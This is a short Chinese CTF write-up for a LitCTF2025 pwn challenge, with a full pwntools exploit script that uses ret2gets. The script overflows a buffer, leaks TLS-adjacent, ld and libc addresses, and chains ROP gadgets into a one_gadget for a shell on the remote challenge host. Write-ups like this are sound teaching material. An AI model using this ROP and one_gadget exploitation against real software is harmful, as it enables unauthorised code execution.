题目
题目链接
攻击思路
没啥好说,就是 ret2gets
但是本地和远程的系统环境不同,导致 leak tls 后情况不一致
远程挺简单的, libc 与 tls 的偏移固定
但我的本地环境 leak 出的是与 ld 相关的地址,这就需要利用 ld 中的 gadget 再去 leak libc
exp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
| from pwn import *
context.log_level = 'debug'
context.arch = 'amd64'
context.terminal = ['tmux', 'splitw', '-h']
debug = 0
if debug:
io = process('./pwn_patched')
else:
io = remote('node4.anna.nssctf.cn', 21460)
rw_addr = 0x404400
gets_plt = 0x401080
puts_plt = 0x401060
again_addr = 0x4011B1
def attack():
payload = b'A' * 32 + p64(rw_addr) + p64(gets_plt) + p64(gets_plt) + p64(puts_plt) + p64(again_addr)
io.sendlineafter(b'LitCTF2025!\n', payload)
io.sendline(b'A' * 8 + b'\x00' * 6)
io.sendline(b'A' * 4)
io.recv(8)
anon_base = u64(io.recv(6).ljust(8, b'\x00')) - 0x740
log.info(f'anon_base = {hex(anon_base)}')
ld_base = anon_base + 0xc000
log.info(f'ld_base = {hex(ld_base)}')
pop_rdi_pop_rbp_ret = ld_base + 0x23dcc
payload = b'A' * 32 + p64(rw_addr) + p64(pop_rdi_pop_rbp_ret) + p64(anon_base + 0x6c0) + p64(rw_addr) + p64(puts_plt) + p64(again_addr)
io.sendlineafter(b'LitCTF2025!\n', payload)
libc_base = u64(io.recv(6).ljust(8, b'\x00')) - 0x20b680
log.info(f'libc_base = {hex(libc_base)}')
pop_rbx_ret = libc_base + 0x586e4
pop_r12_ret = libc_base + 0x110951
onegadget = libc_base + 0xef4ce
payload = b'A' * 32 + p64(rw_addr) + p64(pop_rbx_ret) + p64(0) + p64(pop_r12_ret) + p64(0) + p64(onegadget)
io.sendlineafter(b'LitCTF2025!\n', payload)
io.interactive()
attack()
|
